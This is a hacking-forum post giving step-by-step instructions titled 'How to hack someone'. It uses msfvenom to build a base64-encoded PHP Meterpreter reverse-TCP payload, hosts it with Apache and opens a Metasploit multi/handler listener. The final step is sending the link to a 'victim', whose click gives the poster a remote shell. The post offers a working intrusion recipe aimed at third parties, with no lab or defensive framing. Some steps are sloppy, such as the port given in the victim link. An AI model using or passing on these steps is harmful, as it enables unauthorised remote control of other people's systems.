How to hack someone using a PHP payload

XMAN

Active member
Joined
Jul 12, 2021
Messages
19,642
Reaction score
72
Points
38
How to hack someone using a PHP payload #1
So lets make payloads with php using msfvemon

What is msfvemon?? well metasploit framework venom is a payload gen used on Linunx to generate payloads for exploitation

Lets start by starting apache2 so open terminal and type
Code:
service apache2 start

Step 1:

Now we need our local ip or external ip for local ip enter
Code:
ifconfig
and for external google whats my ip
Note if using external link u need to forward the ports on your router

Step 2:

Now you have the local ip, so lets make the payload
Enter this command:
Code:
msfvenom -p php/meterpreter/reverse_tcp LHOST= 192.168.8.107 LPORT=4444 -e php/base64 -f raw > /root/Desktop/Home.php

Step 3:

Now go to the Desktop and copy the payload to your html file in /var/ww w/html folder
Remove the space ^^

Step 4:

Now open a new terminal and type
Code:
msfconsole

Step 5:

Type these commands:

Code:
use exploit/multi/handler/
Code:
set payload php/meterpreter/reverse_tcp
Code:
set lhost [your local ip]
Code:
set lport 4444
Code:
exploit

Step 6:

Now send the victum the link 192.168.8.107:4444/Home.php

Step 7:

Now type help and you get a full list commands you can run under metasploit 🙂

If anyone wants to leave room for improvement, you can do so Smile
 
Top